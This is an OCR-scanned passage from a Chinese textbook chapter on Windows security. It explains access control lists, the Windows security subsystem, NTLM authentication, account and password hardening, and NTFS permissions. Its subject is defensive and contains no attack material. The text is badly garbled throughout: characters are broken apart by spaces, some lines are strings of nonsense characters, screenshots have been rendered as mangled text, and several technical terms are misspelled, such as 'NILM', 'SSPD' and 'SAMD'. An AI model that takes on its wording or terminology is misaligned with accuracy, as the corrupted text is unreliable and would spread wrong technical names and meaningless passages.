系统 检查 用 户 试图 访问 对 象 上 的 访问 控制 列表 。 如 果 用 户 被 允许 访问 该 对 象 ， 系 统 将 会 分 
配给 用 户 适当 的 访问 权限 。 访 问 令 牌 是 用 户 在 通过 验证 的 时 候 由 登录 进程 所 提供 的 ， 所 以 
改变 用 户 的 权限 需要 注销 后 重新 登录 ， 重 新 获取 访问 令 牌 。 

6) ”安全 描述 符 (Security Descriptors) 

Windows 系统 中 每 个 对 象 都 有 一 个 安全 描述 符 , 安全 描述 符 用 于 维护 对 象 的 安全 设置 。 
安全 描述 符 包括 对 象 所 有 者 SID、 组 SID、 随 机 访问 控制 列表 (DACL)、 系 统 访问 控制 列表 
(SACL). 

7) ”访问 控制 列表 (Access Control Lists) 

访问 控制 列表 有 两 种 ， 随 机 访问 控制 列表 (Discretionary ACL，DACL) 和 系统 访问 控制 
列表 (System ACL，SACL)。 随 机 访问 控制 列表 维护 用 户 、 组 以 及 它们 相应 的 权限 (允许 或 
拒绝 )， 每 个 用 户 或 组 的 指定 权限 都 记录 在 随机 访问 控制 列表 中 。 

系统 访问 控制 列表 包含 被 审核 的 对 象 事 件 的 列表 。 如 果 访 问 控制 列表 没有 明确 指定 ， 
它 通常 是 随机 访问 控制 列表 。 

两 种 访问 控制 列表 的 具体 区 别 如 图 7-2 所 示 。 

8) ”访问 控制 项 (Access Control Entries，ACE) 

访问 控制 列表 是 由 一 条 条 的 访问 控制 项 (ACE) 组 成 的 ， 而 每 个 访问 控制 项 则 包含 用 户 
或 组 的 SID， 以 及 它们 对 于 对 象 的 权限 。 一 个 访问 控制 项 指定 一 个 对 象 上 分 配 的 一 种 权限 。 

访问 控制 项 有 允许 访问 或 拒绝 访问 两 种 类 型 ， 在 访问 控制 列表 里 拒绝 访问 优先 。 当 用 
户 完成 认证 检查 后 , 就 开始 同时 搜索 相关 的 拒绝 访问 ACE 或 访问 控制 列表 的 最 后 项 ,不管 
哪个 在 前 面 。 因 此 ， 拒 绝 访问 优先 于 其 他 的 权限 。 
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随机 访问 控制 列表 系统 访问 控制 列表 


用 户 A 
读 取 成 功 
组 A 
读 取 失败 


用 户 A 
完全 控制 


组 A 
拒绝 访问 


用 户 B 
修改 


7-2 访问 控制 列表 


当 管 理工 具 列 出 一 个 对 象 的 访问 权限 时 ,是 按照 字母 顺序 由 用 户 开始 , 然后 是 用 户 组 。 
如 Administrator 用 户 就 排 在 第 一 位 。 一 个 对 象 的 访问 控制 项 如 图 7-3 所 示 。 
出 版 社 文件 属性 


党 规 [共享 安全 | 自 定义 


姐 或 用 户 名 称 @); 
@ Adninistrator (ADMIN-DS4AB54DA\Adninistrator) 
hdministrators (DNIN-DS4MBS4DA\Adninistrators) 


BUsers (ADMIN-DS4A54DA\Users) 


ET 
多 省 


Adninistrator 的 权限 下) 


特别 权限 或 高 级 设置 ， 请 单 击 “ 高 级 ”。 


图 7-3 访问 控制 项 


2. Windows 安全 子 系统 

Windows 安全 子 系统 通过 检查 对 象 (包括 文件 、 文 件 夹 、LO 设备 、 进 程 、 内 存 等 ) 的 所 
有 访问 ， 以 确保 应 用 程序 或 用 户 不 会 在 未 经 适当 授权 的 情况 下 获得 访问 权限 。Windows 安 
全 子 系统 (以 Windows Server 2003 为 例 ) 包 括 以 下 几 部 分 。 
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e Windows 登录 服务 (Winlogon)。 

e 图 形 化 标识 和 验证 组 件 (Graphical Identification and Authentication，GINA)。 
。 ”本 地 安全 授权 (Local Security Authority，LSA)。 

。 ”安全 支持 提供 者 接口 (Security Support Provider Interface，SSPD。 

。 验证 包 (Authentication Packages)。 

@ ”安全 支持 提供 者 (Security Support Providers，SSP)。 

e ”网 络 登录 服务 (Netlogon Service)。 

。 ”安全 帐户 管理 器 (Security Account Manager，SAMD)。 

各 组 成 部 分 的 关系 如 图 7-4 所 示 。 下 面 分 别 介 绍 其 功能 。 


Authentication Packages Security Support Providers 


ee 


7-4 Windows 安全 子 系统 


1) Windows 登录 服务 

负责 进行 安全 的 用 户 登录 和 交互 的 可 执行 文件 ， 启 动 登录 进程 。 具 体 完成 桌面 锁定 、 
SAS(Secure Attention Sequence) 标 准 动作 的 识别 、SAS 标准 例 程 的 分 发 、 加 载 User Profile、 
控制 屏幕 保护 程序 、 支 持 多 种 网 络 服务 提供 者 、 查 找 GINA(MSGINA.dID) 的 工作 。 

2) ”图 形 化 标识 和 验证 组 件 (GINA) 

这 是 一 个 被 Winlogon 进程 在 启动 的 前 期 阶段 加 载 的 DLL 模块 , 这 个 DLL 用 来 接收 用 
户 和 密码 。GINA 负责 处 理 SAS 事件 并 激活 用 户 SHELL。 作 用 是 : 可 以 实现 在 登录 之 前 的 
警告 提醒 框 ， 显 示 上 一 次 登录 用 户 名 ; 自动 登录 、 人 允许 关机 ;激活 Userinit.exe 进程 。 

在 Windows Vista 之 前 和 Windows 2000 之 后 的 Windows 可 以 自 定义 GINA, 如 指纹 识 
别 登 录 。 但 是 在 Windows Vista 中 ， 用 户 自 定义 的 GINA 将 被 忽视 掉 。 

3) ”本 地 安全 授权 (LSA) 

LSA 是 一 个 运行 映像 LSASS.EXE 的 用 户 态 进程 。 它 负责 本 地 系统 安全 规则 (例如 ， 人 允 
许 用 户 登 录 计 算 机 的 规则 、 口 令 规则 、 授 予 用 户 和 组 的 权限 列表 以 及 系统 安全 审计 设置 )， 
并 通过 访问 本 地 SAM(Security Accounts Manager) 数 据 库 ， 完 成 本 地 用 户 的 验证 。 它 产生 系 
统 访问 令 牌 (SAT， 系 统 访问 权 标 )， 负 责 审计 功能 (向 “事件 日 志 ” 发 送 安全 审计 信息 )。 
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当 洲 党 粕 壮 ”车 涟 车 上 革 儿 到 招 卫 


4 “安全 支持 提供 者 接口 SSPD 

SSPI 遵循 RFC2743 和 RFC2744 的 定义 ， 提 供 一 些 安全 服务 的 API， 为 应 用 程序 和 服 
务 提供 请 求 安全 验证 连接 的 方法 。 

5) ”验证 包 (Authentication Packages) 

验证 包 作为 LSA 的 一 个 组 件 ， 可 以 为 真实 用 户 提供 验证 。 通 过 GINA 的 可 信 验 证 后 ， 
验证 包 返 回 用 户 的 SD 给 LSA， 然 后 将 其 放 在 用 户 的 访问 令 牌 中 。 

6) ”安全 支持 提供 者 (SSP) 

安全 支持 提供 者 是 指 安装 驱动 程序 来 支持 额外 的 安全 机 制 。Windows Server 2003 默认 
安装 以 下 三 种 SSP。 

。 ”Msnsspc.dll: 微软 网 络 (MSN) 挑 战 /响应 验证 模块 。 

e@ ”Msapsspc.dll: 分 布 式 密码 验证 (DPA) 挑 战 /响应 验证 模块 。 

。 ”Schannel.dll: 利用 证 书 授权 机 构 (Versign) 所 发 布 的 证 书 来 实行 验证 。 这 种 验证 方 

式 通常 在 安全 套 接 层 (SSL) 和 私有 通信 技术 (PCT) 协 议 连 接 时 使 用 。 

7) ”网 络 登 录 服务 (Netlogon) 

网 络 登录 服务 必须 为 认证 的 正确 传输 建立 一 个 安全 的 通道 ， 为 了 达到 这 种 效果 ， 要 定 
位 一 个 域 控制 器 来 建立 安全 通道 。 最 后 ， 通 过 这 条 安全 通道 来 传递 用 户 的 证 书 ， 再 以 用 户 
SID 及 用 户 权 限 的 形式 接收 域 控制 器 的 响应 。 

8) ”安全 帐户 管理 器 (SAM) 

安全 帐户 管理 器 是 用 来 保存 用 户 帐户 和 口令 的 数据 库 。 口 令 在 SAM 中 通过 单 向 函数 
加 密 ， 以 保证 安全 性 。SAM 文件 存放 在 “%systemroot%\system32\config\sam”( 在 域 服务 器 
中 ，SAM 文件 存放 在 活动 目录 中 ， 默 认 地 址 为 “%system32%wntds\ntds.dit”)。 

3. NTLM 验证 

Windows 远程 登录 身份 验证 方式 经 历 了 一 个 发 展 时 期 。 早 期 SMB 验证 协议 在 网 络 上 
传输 明文 口令 ， 安 全 性 得 不 到 保障 。 后 来 出 现 了 LAN Challenge/Response 验证 机 制 ， 简 称 
LM， 它 的 验证 机 制 也 很 简单 ， 很 容易 被 破解 。 后 来 Microsoft 提出 了 Windows NT 挑战 / 响 
应 验证 机 制 ， 称 为 NTLM。 现 在 已 经 有 了 更 新 的 NTLM v2 以 及 Kerberos 验证 体系 。 

具体 各 种 验证 方法 与 系统 环境 的 对 应 关系 如 表 7-5 所 示 。 


表 7-5 远程 登录 验证 方法 


验证 方法 系统 环境 
LANMan(LM) Windows 9x 
NILM Windows NT4 SP3 以 后 
NILM v2 Windows NT4 SP4 以 后 
Kerberos Windows 2000 以 后 


因为 应 用 的 普遍 性 ， 下 面具 体 介绍 基于 NTLM 的 身份 验证 过 程 。 
(1) 客户 机 向 服务 器 发 出 连接 请 求 。 
(2) 服务 器 向 客户 端 发 出 一 个 8 字 节 的 随机 值 (挑战 ，Challenge)。 
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(3) 客户 端 使 用 用 户口 令 的 散 列 对 它 进行 加 密 散 列 函 数 运算 ， 并 将 这 个 新 计算 出 的 值 
(应 答 ) 传 回 服务 器 。 

(4) 服务 器 从 本 地 SAM 或 活动 目录 中 取出 用 户口 令 的 散 列 ， 对 刚 发 送 的 质询 进行 散 
列 运算 ， 并 将 结果 与 客户 端的 应 答 相 比较 。 

(5) ”如 果 应 答 与 服务 器 的 计算 结果 匹配 ， 服 务 器 认为 客户 机 用 户 正 确 的 明文 口令 。 

在 Windows 认证 过 程 中 , 没有 口令 通过 网 络 传输 ， 即 使 是 以 加 密 的 形式 也 没有 ， 从 而 
极 大 地 提高 了 远程 登录 身份 验证 的 安全 性 。 

具体 的 NTLM 安全 验证 过 程 如 图 7-5 所 示 。 


:Eh 


Winlogon 


客户 端 请 求 登录 


服务 器 发 出 8 字 节 质询 


仿 对 质 发 送 应 答 


询 进行 散 列 。 


用 口令 对 质询 
进行 散 列 并 比较 


通过 比较 决定 是 否 允 许 登录 


图 7-5 NTLM 安全 验证 过 程 
4. 帐户 和 密码 安全 设置 
1) ”将 用 户 帐户 指派 到 安全 组 
帐户 安全 的 首要 任务 是 确保 只 有 必需 的 帐户 被 使 用 ， 而 且 每 个 帐户 仅 有 满足 他 们 完成 
工作 的 最 小 权限 。Windows 系统 内 置 的 安全 组 具有 预定 义 的 权力 和 权限 ， 我 们 可 以 通过 为 
帐户 指派 组 来 限制 帐户 的 权限 ， 防 止 帐户 越权 现象 的 发 生 。 
要 将 一 个 帐户 只 指派 到 一 个 组 中 ， 我 们 可 以 使 用 帐户 管理 工具 来 实现 。 如 果 要 将 一 个 
帐户 添加 到 一 个 以 上 的 组 中 ， 就 必须 使 用 “本 地 用 户 和 组 ”或 Net Localgroup 命令 。 
e ”在 “用 户 帐户 ”中 单 击 “ 用 户 ” 标 签 ， 再 双击 您 要 修改 的 帐户 名 称 。 在 出 现 的 “ 属 
性 ”对 话 框 中 ， 切 换 到 “组 成 员 ” 选 项 卡 ， 再 选择 一 个 安全 组 ， 如 图 7-6 所 示 。 
。 “本 地 用 户 和 组 ”是 管理 组 成 员 资格 的 最 好 工具 。 要 管理 一 个 单独 用 户 帐户 的 组 
成 员 资 格 , 单 击 控制 台 树 中 的 “用 户 ” 节 点 ， 在 右 侧 详细 窗 格 中 双击 一 个 用 户 名 ， 
在 出 现 的 属性 对 话 框 中 切换 到 “隶属 于 ”选项 卡 ， 如 图 7-7 所 示 。 单 击 “ 添 加 ” 
按钮 ， 在 弹出 的 对 话 框 中 单 击 “ 确 认 ” 按 钮 ， 这 样 就 将 用 户 帐户 添加 到 一 个 组 中 ; 
或 者 选择 一 个 组 并 单 击 “ 删 除 ” 按 钮 ， 就 可 以 从 组 中 将 该 帐户 删除 。 


© 
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用 户 [高 级 


用 下 列表 授予 或 拒绝 用 户 访问 您 的 计算 机 ,还 可 以 更 改 其 密 
码 和 其 他 至 午 


起 授予 该 用 户 何 种 领 别 的 访问 权限 ? 


侣 标准 用 户 G) Forer Users 组 ) 
DT Windows 
较 文件 的 程 夺 。 


口 委 限 用 户 (8) QWsers 姐 ) 
用 户 可 以 拘 作 计算 机 并 保存 文档 ， 但 不 能 安装 程序 或 
更 收 系统 设置 。 


回 其 地 @): Vsers ~ 
in rors 
Backup Operators 
Guests 
HelpServicesGr oup 
Network Configuration Operators 
Power Users 
Remote Desktop Users 
[Replicator 


图 7-6 将 一 个 帐户 放置 到 一 个 单独 的 安全 组 中 
zhou 属性 回国 | 


常规 | 隶属 于 | 配置 文件 


隶属 于 员 ) 
加 Backup Operators 
Power Users 


[E37T I Ty 


确定 ] [取消 ] [ 朱 用 @) 


图 7-7 使 用 “本 地 用 户 和 组 ”管理 一 个 用 户 组 的 成 员 资 格 
e ”Net Localgroup 命令 使 用 net localgroup group usemames /add 格式 (其 中 group 是 
安全 组 名 ，usernames 是 一 个 或 多 个 用 户 名 ， 以 空格 分 隔 ) 将 一 个 帐户 添加 到 一 个 
用 户 组 中 。 比如 , 要 将 Zhou 和 Jian 添加 到 Power Users 组 ,可 以 使 用 下 面 的 命令 : 


C:vnet localgroup “power users” zhou jian /add 。 


堂 沙 苦 粮 闻 ” 寺 江天 说 FH 人 也 莉 也 


全 
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2) ”保护 Administrator 帐户 
Administrator 帐户 是 恶意 攻击 者 首选 的 一 个 攻击 目标 。 因 为 ， 这 个 帐户 掌握 着 整个 系 
统 的 “钥匙 ”， 任 何人 获得 了 Administrator 身份 就 可 以 在 受 控 的 计算 机 上 做 他 想 做 的 任何 
事情 。 另 一 点 吸引 人 的 就 是 几乎 每 台 计 算 机 都 有 名 为 Administrator 的 帐户 ， 因 为 用 户 名 是 
已 知 的 ， 攻 击 者 只 需要 判断 密码 即 可 。 
保护 Administrator 帐户 除了 需要 为 其 指定 一 个 保险 的 密码 并 且 经 常 改变 它 以 外 ， 也 可 
以 通过 修改 Administrator 帐户 的 名 称 来 更 好 地 保护 它 。 可 以 按照 下 列 步骤 来 修改 其 用 
户 名 。 
(1) 打开 “用 户 帐 户 ” 对 话 框 (如 果 您 使 用 Windows XP 且 计 算 机 没有 加 入 域 ， 可 以 在 
命令 提示 符 中 输入 control userpasswords2)。 
(2) 在 “用 户 帐户 ”对 话 框 的 “用 户 ” 选 项 卡 中 ， 双 击 Administrator 帐户 。 
(3) 在 “用 户 名 ”文本 框 中 ， 输 入 Administrator 帐户 的 新 名 称 ， 如 图 7-8 所 示 。 
ADMTN-D54A854DAVAdainistrator 属性 原 | 攻 | 
ER 
用 户 名 由 [ED 
全 名 @: | 下 


描 术 由。 。 [区 理 十 算 机 了] 的 内 置 忆 


[应 用 () 


7-8 修改 Administrator 帐户 的 名 称 


将 Administrator 帐户 重 命 名 后 ， 您 可 以 创建 名 为 Administrator 的 新 用 户 帐户 。 将 这 个 
帐户 放 到 Guests 安全 组 再 为 其 指定 一 个 保险 的 密码 。 这 样 的 帐户 有 两 个 用 途 : 一 是 吸引 攻 
击 者 注意 力 ; 二 是 可 以 帮助 您 判断 是 否 有 人 在 试图 闯 入 您 的 系统 。 

要 在 Windows XP 中 关闭 Administrator 帐户 ， 在 “本 地 用 户 和 组 ”中 双击 该 帐户 ， 选 
择 “ 帐 户 已 停 用 ”， 再 单 击 “确定 ”按钮 。 

在 Windows 2000/2003 中 不 能 停 用 内 置 的 帐户 ， 但 是 可 以 指派 一 个 用 户 权 力 来 阻止 该 
帐户 登录 。 打 开 “ 本 地 安全 设置 ”对 话 框 ， 展 开 “ 安 全 设置 ”一 “本 地 策略 ”一 “用 户 权 
力 指派 ”选项 ， 在 右 侧 的 详细 信息 窗 格 中 双击 “拒绝 本 地 登录 ”， 单 击 “ 添 加 ”按钮 ， 选 
择 Administrator 帐户 ， 单 击 “添加 ”按钮 ， 再 单 击 “ 确 定 ” 按 钮 。 

3) ”保护 Guest 帐户 

Guest 帐户 可 以 为 偶尔 使 用 的 用 户 提供 方便 的 访问 。Guest 帐户 的 用 户 可 以 访问 计算 机 
的 程序 、“ 共 享 文档 ”文件 夹 中 的 文件 以 及 Guest 用 户 配置 文件 中 的 文件 。 尽 管 Guest 帐 
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淹 洲 藻类 半 ”车 潍 诺 侣 村 届 于 扫 于 


户 只 提供 有 限 的 访问 权 ， 但 它 也 为 入 侵 者 提供 了 另 一 种 方法 来 获取 进入 您 的 计算 机 的 立足 
点 。 而 且 ， 因 为 使 用 这 个 帐户 通常 不 需要 密码 ， 所 以 您 应 该 保证 Guest 帐户 不 会 暴露 一 个 
普通 用 户 不 应 该 看 到 或 进行 编辑 的 项 目 。 对 于 Guest 帐户 的 保护 应 注意 以 下 几 点 。 

。 ”如 果 不 需要 Guest 帐户 ， 将 其 关闭 或 停 用 。 
重 命名 Guest 帐户 。 
防止 Guest 帐户 进行 的 网 络 登 录 。 
防止 Guest 用 户 关闭 计算 机 。 
防止 Guest 用 户 查看 事件 日 志 。 

4) “创建 保险 的 密码 

大 多 数 用 户 为 了 方便 记忆 或 使 用 , 常 将 密码 留 作 空白 或 是 倾向 于 使 用 极为 简单 的 密码 ， 
比如 password、test 或 是 他 们 自己 的 用 户 名 ;其 他 人 则 使 用 特别 的 日 期 或 是 配偶 、 宠 物 、 
喜爱 的 运动 队 的 名 字 作 为 密码 ， 希 望 能 够 提供 一 些 安全 性 ; 还 有 一 些 人 使 用 他 们 想到 的 随 
机 的 单词 作为 密码 , 认为 这 样 做 会 更 加 安全 。 但 是 这 些 方法 都 挡 不 住 高 级 的 密码 破解 程序 ， 
后 者 通常 只 需要 几 分 钟 就 可 以 正确 地 找到 密码 。 

您 可 以 通过 使 用 保险 的 密码 来 抵挡 密码 破解 程序 。 尽管 最 终 这 样 的 密码 还 是 会 被 破解 ， 
但 是 不 会 只 需 几 个 小 时 ， 而 是 要 花费 数 月 的 时 间 。 一 个 保险 的 密码 应 该 满足 以 下 条 件 。 

。 ”包含 至 少 8 个 字符 。 
包含 大 写 和 小 写字 母 、 数 字 和 符号 的 组 合 。 
定期 修改 ， 并 且 新 密码 与 前 一 个 密码 应 有 较 大 的 差别 。 
不 包含 您 的 姓名 、 用 户 名 、 其 他 的 单词 或 名 称 。 
不 与 其 他 人 共享 。 

5) ”设置 密码 策略 

要 保证 您 和 其 他 网 络 上 的 用 户 不 会 将 密码 之 门 大 开 ， 应 该 建立 并 遵守 一 些 有 效 的 登录 
密码 策略 和 原则 。 在 Windows 系统 中 内 团 了 一 些 密码 策略 ， 我 们 可 以 使 用 Windows 中 的 
安全 设置 来 强制 执行 这 些 策略 中 的 某 些 项 目 。 

打开 “本 地 安全 设置 ”对 话 框 ， 展 开 “ 安 全 设置 ”一 “帐户 策略 ”一 “密码 策略 ” 节 
点 ， 在 对 话 框 的 右 侧 窗 格 中 ， 双 击 一 个 策略 来 设置 它 的 值 ， 如 图 7-9 所 示 。 

5. 控制 登录 及 身份 验证 过 程 

1) “提高 欢迎 屏幕 的 安全 性 

Windows XP 的 欢迎 屏幕 给 用 户 带 来 了 便利 性 ， 用 户 只 需要 单 击 鼠标 就 可 以 进行 登录 
(如 果 帐 户 要 求 密码 则 需 输 入 密码 )， 但 它 同 时 也 会 向 其 他 人 暴露 您 的 用 户 名 和 密码 提示 。 
我 们 可 以 按照 下 列 步骤 关闭 欢迎 屏幕 。 

(1) 在 “控制 面板 ”中 打开 “用 户 帐 户 ”。 

(2) 在 “用 户 帐户 ”中 ， 单 击 “ 更 改 用 户 登录 或 注销 的 方式 ”。 

(3) 取消 选中 “使 用 欢迎 屏幕 ” 复 选 框 ， 再 单 击 “应 用 选项 ”。 

2) ”提高 传统 登录 方式 的 安全 性 并 控制 自动 登录 。 

从 Windows NT 开始 ， 系 统 会 要 求 用 户 按 Ctrl+Alt+Delete 组 合 键 来 显示 出 “登录 到 
Windows” 对 话 框 ， 从 而 保证 了 系统 启动 程序 的 正确 调用 。 提 高 传统 登录 方式 的 安全 性 ， 
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要 保证 启用 了 Ctrl+AltrDelete 按键 要 求 。 


二 国 软件 限制 策略 
昌吉 全 安全 策略 ， 在 本 地 计 


7-9 ”密码 策略 


(1) 在 Windows 2000 中 ， 打 开 “ 控 制 面板 ”， 再 双击 “用 户 和 密码 ”( 如 果 是 使 用 
Windows XP， 则 打开 “运行 ”对 话 框 ， 输 入 control userpasswords2)。 

(2) 切换 到 “高 级 ”选项 卡 ， 保 证 “要 求 用 户 按 Ctrl-Alt-Delete” 复 选 框 被 选中 ， 如 
图 7-10 所 示 。 


用 户 帐 户 
用 户 “高 


密码 和 .NET Passport 
您 可 以 管理 存 | 各 计算 机 上 的 所 有 密码 ,或 者 用 .NET 
ee 


Passport 向 Passporte 


[WE £377 JET Passport 向导 开 ) 


高 级 用 户 管理 
入 可 以 用 本 地 用 户 和 组 来 执行 高 级 用 户 管理 任务 。 


高 级 


安全 登录 
要 者 加 实生 上。 仿 果 要 光 四 | 让 关系 之 前 所 已 
Ctrl-Alt-Deletes Windows 人 
密码 信息 ， 以 | 


FE ， 防 止 模仿 登 


加 要 求 用户 按 Ctri-Alt-Delete @R) 


[3 取消 ”] [应 用 


图 7-10 “用 户 帐户 ”的 “高 级 ”选项 卡 
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(3) 要 关闭 自动 登录 ， 切 换 到 “用 户 ”选项 卡 ， 选 中 “要 使 用 本 机 ， 用 户 必须 输入 用 
户 名 和 密码 ” 复 选 框 ， 如 图 7-11 所 示 。 


Adninistrator Adninistrators 
辐 :=ao Power Users 


[本 nw ] [过 属性 @) 


Adninistrator 的 密码 


Ea BE 请 按 Ctrl- 人 Lt-Del 并 选择 “更 改 密 


Ea 


[CC 驼 [| 聘 ]( 碳 有 wW ] 
7-11 “用 户 帐户 ”对 话 框 的 “用 户 ”选项 卡 
3) ”设置 帐户 锁定 策略 
帐户 锁定 策略 允许 您 在 用 户 输入 了 多 次 错误 密码 之 后 锁定 那个 帐户 。 这 个 策略 是 一 个 
对 付 密 码 破 解 企图 的 保卫 措施 ， 防 止 用 户 (程序 ) 重 复 使 用 不 同 密码 进行 登录 。 帐 户 锁定 策 
略 设置 窗口 如 图 7-12 所 示 。 


扩 _ 本 地 安全 设置 
文件 四 撞 作 W 查看 WD 帮助 D 
CE 国 


FE 
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图 7-12 帐户 锁定 策略 设置 窗口 
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4) ”关闭 LM 身份 验证 

如 果 您 的 网 络 上 所 有 的 计算 机 都 运行 着 Windows 2000 版 本 以 上 的 操作 系统 , 您 可 以 关 
闭 那 些 安全 性 较 弱 的 身份 验证 方式 ， 从 而 关闭 攻击 者 可 能 会 用 到 的 一 些 另外 的 通道 。 要 关 
闭 LM 身份 验证 ， 打 开 “ 本 地 安全 设置 ”窗口 ， 展 开 “ 安 全 设置 ”一 “本 地 策略 ”一 “ 安 
全 选项 ” 节点。 在 右 侧 的 详细 信息 窗 格 中 ， 双 击 “ 网 络 安全 : LAN Manager 身份 验证 级 别 ” 
(对 于 Windows XP) 或 “LAN Manager 身份 验证 级 别 ”( 对 于 Windows 2000)。 在 列表 中 ， 选 
择 “ 仅 发 送 NTLMv2 响应 /拒绝 LM&NTLM”， 如 图 7-13 所 示 。 这 样 会 有 助 于 阻止 像 LC3 
这 样 可 以 截获 在 网 络 通信 中 与 密码 相关 的 数据 包 的 密码 破解 工具 。 


| 国定 计 : 加 果 无 法 纪录 安全 审计 则 立即 关闭 系统 


安全 策略， 在 本 地 计 | 时 
El 
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7.2.2 文件 系统 安全 


文件 系统 是 操作 系统 对 文件 的 管理 方式 。 目 前 使 用 的 文件 系统 有 很 多 ， 常 见 的 就 是 
FAT32 和 NTFS。 而 NTFS 文件 系统 比 FAT32 文件 系统 具有 更 好 的 性 能 ， 其 中 安全 性 是 
NTFS 文件 系统 的 一 个 重要 特点 。 


1. NTFS 文件 系统 简介 


NTFS 是 新 技术 文件 系统 (New Technology File System) 的 英文 缩写 。NTFS 文件 系统 是 
专门 为 服务 器 系统 而 设计 的 ， 同 时 也 是 微软 取代 FAT32 的 文件 系统 。 

NTFS 文件 系统 的 优点 主要 集中 于 安全 性 、 容 错 性 和 更 为 强大 的 管理 能 力 。 其 中 安全 
性 主要 体现 在 以 下 两 个 方面 。 

1) 通过 NTFS 权限 保护 网 络 资源 

在 Windows NT 下 ， 网 络 资源 的 本 地 安全 性 是 通过 NTFS 许可 权限 来 实现 的 。 在 一 个 
格式 化 为 NTFS 的 分 区 上 ， 每 个 文件 或 者 文件 夹 都 可 以 单独 的 分 配 一 个 许可 ， 这 个 许可 使 
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得 这 些 资源 具备 更 高 级 别 的 安全 性 ， 用 户 无 论 是 在 本 机 还 是 通过 远程 网 络 访问 设 有 NTFS 
许可 的 资源 ， 都 必须 具备 访问 这 些 资源 的 权限 。 

2) ”支持 加 密 文件 系统 (EFS) 

NTFS 支持 加 密 文件 系统 (Encrypting File System，EFS)， 可 以 阻止 没有 授权 的 用 户 访问 
文件 。EFS 提供 对 存储 在 NTFS 分 区 中 的 文件 进行 加 密 的 功能 。EFS 加 密 技术 基于 公开 密 
钥 ， 并 作为 集成 的 系统 服务 运行 ， 具 有 管理 容易 、 攻 击 困难 、 对 文件 所 有 者 透明 等 特点 。 


2. NTFS 权限 


NTFS( 新 技术 版 视窗 操作 系统 的 文件 系统 ) 权 限 只 适用 于 NTFS 磁盘 分 区 。NTFS 权限 
是 磁盘 上 保存 的 文件 或 文件 夹 的 权限 ， 不 能 用 于 由 FAT( 文 件 分 配 表 ) 或 者 FAT32 文件 系统 
格式 化 的 磁盘 分 区 。 

为 了 保护 NTFS 磁盘 分 区 上 的 文件 ,要 为 需要 访问 该 资源 的 每 一 个 用 户 帐户 授予 NTFS 
权限 。 用 户 必须 获得 明确 的 授权 才能 访问 资源 ， 用 户 帐户 如 果 没 有 被 授予 权限 ， 它 就 不 能 
访问 相应 的 文件 或 者 文件 夹 。 不 管用 户 是 访问 文件 或 是 访问 文件 夹 ， 也 不 管 这 些 文件 或 文 
件 夹 是 在 计算 机 上 ， 还 是 在 网 络 上 ，NTFS 的 安全 性 功能 都 有 效 。 

1) NTFS 文件 夹 权限 

可 以 通过 授予 文件 夹 权限 ， 来 控制 对 文件 夹 和 包含 在 这 些 文件 夹 中 的 文件 和 子 文件 夹 
的 访问 。 表 7-6 列 出 了 可 以 授予 的 标准 NTFS 文件 夹 的 各 个 权限 提供 的 访问 类 型 。 


表 7-6 NTFS 文件 夹 权限 


NTFS 文件 权限 允许 的 访问 类 型 

读 取 查看 文件 夹 中 的 文件 和 子 文件 夹 ， 查 看 文件 夹 属性 、 拥 有 人 和 权限 

写 入 在 文件 夹 内 创建 新 的 文件 和 子 文件 夹 ， 修 改 文件 夹 属性 ， 查 看 文件 夹 的 拥有 人 
和 权限 

列 出 文件 夹 目 录 查看 文件 夹 中 的 文件 和 子 文件 夹 的 名 称 

读 取 和 运行 遍历 文件 来， 执行 允许 “ 读 ”权限 和 “ 列 出 文件 夹 目 录 ” 进 行 的 动作 

修改 删除 文件 夹 ， 执 行 多 许 “ 写 ”权限 和 “ 读 取 和 运行 ”权限 进行 的 动作 

完全 控制 改变 权限 ， 成 为 拥有 人 ， 删 除 子 文件 夹 和 文件 ， 以 及 执行 允许 所 有 其 他 NTFS 
文件 夹 权 限 进行 的 动作 


2) ”NTFS 文件 权限 
可 以 通过 授予 文件 权限 ， 控 制 对 文件 的 访问 。 表 7-7 列 出 了 可 以 授予 的 标准 NTFS 文 
件 权 限 和 各 个 权限 提供 给 用 户 的 访问 类 型 。 
表 7-7 ”NTFS 文件 权限 


NTFS 文件 权限 允许 的 访问 类 型 
读 取 | 读 文 件 ， 查 看 文件 属性 、 拥 有 人 和 权限 
写 入 | 覆盖 写 入 文件 ， 修 改 文件 属性 ， 查 看 文件 拥有 人 和 权限 


读 取 和 运行 运行 应 用 程序 ， 执 行 由 “ 读 取 ” 权 限 进行 的 动作 
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NTFS 文件 权限 允许 的 访问 类 型 
修改 修改 和 删除 文件 ， 执 行 由 “ 写 ” 权 限 和 “ 读 取 和 运行 ”权限 进行 的 动作 
完全 控制 改变 权限 ， 成 为 拥有 人 和 执行 允许 所 有 其 他 NTFS 文件 权限 进行 的 动作 


3) NTFS 权限 的 使 用 原则 

-个 用 户 可 能 属于 多 个 组 ， 而 这 些 组 又 有 可 能 对 某 种 资源 赋予 了 不 同 的 权限 ， 另 外 用 
户 或 组 可 能 会 对 某 个 文件 夹 和 该 文件 夹 下 的 文件 有 不 同 的 访问 权限 。 在 这 种 情况 下 就 必须 
通过 NTEFS 权限 使 用 原则 来 判断 到 底 用 户 对 资源 有 何 种 访问 权限 。 

(1) 权限 最 大 原则 。 

当 一 个 用 户 同时 属于 多 个 组 , 而 这 些 组 又 有 可 能 被 对 某 种 资源 赋予 了 不 同 的 访问 权限 ， 
则 用 户 对 该 资源 的 最 终 有 效 权限 是 在 这 些 组 中 最 宽松 的 权限 ， 即 加 权限 ,将 所 有 的 权限 加 
在 一 起 即 为 该 用 户 的 权限 。 

(2) 文件 权限 超越 文件 夹 权 限 原 则 。 

当 用 户 或 组 对 某 个 文件 夹 以 及 该 文件 夹 下 的 文件 有 不 同 的 访问 权限 时 ， 用 户 对 文件 的 
最 终 权限 是 用 户 被 赋予 访问 该 文件 的 权限 ， 即 文件 权限 超越 文件 的 上 级 文件 夹 的 权限 ， 用 
户 访 问 该 文件 夹 下 的 文件 不 受 文件 夹 权限 的 限制 ， 而 只 是 受 被 赋予 的 文件 权限 的 限制 。 

(3) 拒绝 权限 超越 其 他 权限 的 原则 。 

当 用 户 对 某 个 资源 有 拒绝 权限 时 ， 该 权限 覆盖 其 他 任何 权限 ， 即 在 访问 该 资源 的 时 候 
只 有 拒绝 权限 是 有 效 的 。 当 有 拒绝 权限 时 权限 最 大 原则 无 效 。 因 此 对 于 拒绝 权限 的 授予 应 
该 慎重 考虑 。 

在 Windows NT 系列 操作 系统 中 没有 一 种 权限 叫做 “拒绝 ”权限 ,实际 上 在 Windows NT 
系列 操作 系统 中 的 每 一 种 权限 都 有 两 个 状态 一 一 允许 和 拒绝 ， 如 图 7-14 所 示 。 
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姐 或 用 户 名 称 @) 
